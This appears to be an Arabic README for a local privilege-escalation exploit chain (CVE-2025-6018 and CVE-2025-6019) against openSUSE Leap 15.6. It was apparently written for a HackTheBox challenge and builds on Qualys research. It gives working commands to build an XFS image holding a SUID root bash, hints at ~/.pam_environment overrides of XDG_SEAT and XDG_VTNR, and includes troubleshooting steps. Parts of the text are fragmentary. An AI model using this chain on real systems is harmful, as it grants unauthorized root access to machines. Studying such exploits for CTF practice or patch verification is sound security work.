
سلسلة استغلال تصعيد الامتيازات (CVE-2025-6018 + CVE-2025-6019) لـ openSUSE Leap 15.6
تم تطوير هذا الاستغلال لحل تحدي من HackTheBox يستهدف openSUSE Leap 15.6.
يعتمد هذا الاستغلال على البحث الأصلي لفريق أمان Qualys:
تنفيذ مرجعي إضافي:
يجمع هذا الاستغلال بين ثغرتين لتحقيق تصعيد الصلاحيات محليًا من مستخدم غير مميز إلى صلاحيات root على openSUSE Leap 15.6:
يتطلب الاستغلال صورة نظام ملفات XFS مُنشأة مسبقًا وتحتوي على ثنائي bash مع SUID. يجب إنشاء هذه الصورة على جهاز Linux حيث تملك صلاحيات root:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
تحقق من إنشاء الصورة بشكل صحيح:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment مع تجاوزات XDG_SEAT وXDG_VTNRإذا فشل الاستغلال:
file xfs.imagesystemctl status udisks2هذا الاستغلال مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. استخدمه بمسؤولية وعلى الأنظمة التي لديك إذن باختبارها فقط.